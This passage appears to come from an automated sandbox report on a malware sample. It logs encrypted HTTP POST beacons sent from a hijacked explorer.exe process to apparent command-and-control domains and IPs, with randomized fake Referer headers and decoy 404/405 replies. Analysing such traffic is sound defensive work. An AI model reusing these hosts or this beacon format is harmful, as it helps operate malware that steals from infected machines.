                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)VoaC'5mKqz,0pSBfe;0r*p0O5EnL=bI+VTf[Ynph+UtYc@8*~I`+a+&z@
                                            Dec 19, 2024 11:01:06.509078026 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:06 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            46192.168.2.55002394.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:06.634035110 CET284OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://swhsbooovvrt.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 205
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:01:06.634068966 CET205OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 83 0d 3b d6
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC);t7{egFO2*DIq|JCyF-g&O)nQGa5gyx%iV7~qDd
                                            Dec 19, 2024 11:01:08.004259109 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:07 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            47192.168.2.550024194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:08.136343956 CET278OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://odsnbdoswem.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 119
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:01:08.136374950 CET119OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e7 46 55 b5
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)FU3S`',*O<
                                            Dec 19, 2024 11:01:09.477787971 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:09 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            48192.168.2.55002594.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:14.152884960 CET283OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://jrdgusgumlecx.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 319
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:01:14.152934074 CET319OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 94 49 70 9f
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)IpZZV>uC=_EaJO7;I+3Bmk~Fpu&`8W-h!oftnNkYK,Y&d[.KMW=53.j
                                            Dec 19, 2024 11:01:15.514272928 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:15 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            49192.168.2.55002694.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:15.643481016 CET286OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ljmtvjfukirthh.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 325
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:01:15.643481016 CET325OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be a7 5f 4b ae
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)_K(UOwH#f4A0*q5o^/0Z+.'m@|1INv(%#:=rye{nD5mJp/l=GuMF\td1}u3@J
                                            Dec 19, 2024 11:01:17.013854027 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:16 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            50192.168.2.550027194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:17.145970106 CET283OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://vlctchybxmsfmihs.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 332
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:01:17.145992994 CET332OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 87 1f 25 95
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)%9U3 FdrQXu&b[AX22C{auLHyu[sioaZ [oa)N`10DAXrt&k89>~,9aJ^f8PHp
                                            Dec 19, 2024 11:01:18.481949091 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:18 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            51192.168.2.55002894.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:22.850096941 CET283OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://sgmoymnkvjycr.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 237
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:01:22.850096941 CET237OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be fb 06 48 c5
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)H]U@R>8.,- yZm1F+"alFmt|E$~_D*|rr?uYwU#roTY!~F*Q&f";q5Gn\1,{j5]
                                            Dec 19, 2024 11:01:24.212259054 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:23 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            52192.168.2.55002994.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:24.338927984 CET286OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://nnfjblhdxniepv.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 230
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:01:24.338943005 CET230OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 8e 23 3a c5
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)#:<L,*'U-l8@Exj&U/x{nZbN$CdvuV#holnFU^ Tlj5.\g
                                            Dec 19, 2024 11:01:25.693094015 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:25 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            53192.168.2.550030194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:25.834745884 CET279OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://gwxdktlpqqov.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 167
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:01:25.834745884 CET167OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be bd 06 6f db
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)oTvRRwS'~u:g\)19B\S!n^lp?uhUmAF
                                            Dec 19, 2024 11:01:27.174427986 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:26 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            54192.168.2.55003194.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:31.331737995 CET281OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ygdgxkxjwyg.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 270
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:01:31.334003925 CET270OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be a3 3f 4c 97
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)?LpTwKbdb'D^H [khRm"f6B.Z.pGV|*vMS"@0u`LLsg@}~gd~3+Mw=s_d/T
                                            Dec 19, 2024 11:01:32.784692049 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:32 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 